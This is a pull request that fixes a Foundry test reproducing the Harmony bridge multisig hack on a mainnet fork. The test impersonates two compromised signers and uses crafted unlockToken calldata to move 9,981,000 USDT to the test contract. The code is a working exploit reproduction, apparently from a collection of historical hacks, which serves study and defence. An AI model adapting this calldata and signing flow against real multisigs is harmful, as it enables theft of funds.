### PR TITLE
fix Harmony_multisig

### DIFF
--- a/src/test/Harmony_multisig.sol
+++ b/src/test/Harmony_multisig.sol
@@ -13,10 +13,14 @@ contract ContractTest is DSTest {
   address[] public owner;
 
   function setUp() public {
-    cheat.createSelectFork("mainnet", 15012670); //fork mainnet at block 15012670
+    cheat.createSelectFork("mainnet", 15012645); //fork mainnet at block 15012645
   }
 
   function testExploit() public {
+    emit log_named_uint(
+      "USDT balance of attacker before Exploit",
+      usdt.balanceOf(address(this))
+    );
     // Mulsig Case of compromised private key.
     emit log_named_uint(
       "How many approval required:",
@@ -24,10 +28,14 @@ contract ContractTest is DSTest {
     );
     cheat.prank(0xf845A7ee8477AD1FB4446651E548901a2635A915);
     // TxHash: https://etherscan.io/tx/0x27981c7289c372e601c9475e5b5466310be18ed10b59d1ac840145f6e7804c97
-    MultiSigWallet.submitTransaction(
+    bytes memory msgP1 = hex"fe7f61ea000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000913e1f5a200000000000000000000000000";
+    bytes memory recipient = abi.encodePacked(address(this));
+    bytes memory receiptId = hex"d48d952695ede26c0ac11a6028ab1be6059e9d104b55208931a84e99ef5479b6";
+    bytes memory _message = bytes.concat(msgP1, recipient, receiptId);
+    uint256 txId = MultiSigWallet.submitTransaction(
       0x2dCCDB493827E15a5dC8f8b72147E6c4A5620857, // destination
       0, // value
-      hex"fe7f61ea000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000913e1f5a200000000000000000000000000b4c79dab8f259c7aee6e5b2aa729821864227e84d48d952695ede26c0ac11a6028ab1be6059e9d104b55208931a84e99ef5479b6"
+      _message
       // unlockToken(address,uint256,address,bytes32)
       // ethToken: dac17f958d2ee523a2206206994597c13d831ec7
       // amount: 9981000000000
@@ -36,16 +44,16 @@ contract ContractTest is DSTest {
     ); 
     emit log_named_address(
       "2 of 5 multisig wallet, transaction first signed by:",
-      MultiSigWallet.getConfirmations(21109)[0]
+      MultiSigWallet.getConfirmations(txId)[0]
     );
     cheat.prank(0x812d8622C6F3c45959439e7ede3C580dA06f8f25);
-    MultiSigWallet.confirmTransaction(21109); // Transfer 9,981,000 USDT to address(this)
+    MultiSigWallet.confirmTransaction(txId); // Transfer 9,981,000 USDT to address(this)
     emit log_named_address(
       "2 of 5 multisig wallet, transaction second signed by:",
-      MultiSigWallet.getConfirmations(21109)[1]
+      MultiSigWallet.getConfirmations(txId)[1]
     );
     emit log_named_uint(
-      "USDT balance of attacker",
+      "USDT balance of attacker after Exploit",
       usdt.balanceOf(address(this))
     );
   }


### PR DESCRIPTION
Fix by:

- Updating block number before real hack
- Fix calldata to take address(this) to be used as recipient of the hack (balance was wrong not showing any USDT so I realized that something was not ok)
- Remove hardcoded transaction id taking it from the multisig return uint.

Result:

<img width="710" alt="Captura de Pantalla 2023-01-08 a las 23 14 37" src="https://user-images.githubusercontent.com/29550529/211221755-5596c907-b879-4b2b-a0b7-54241b3ae5b9.png">

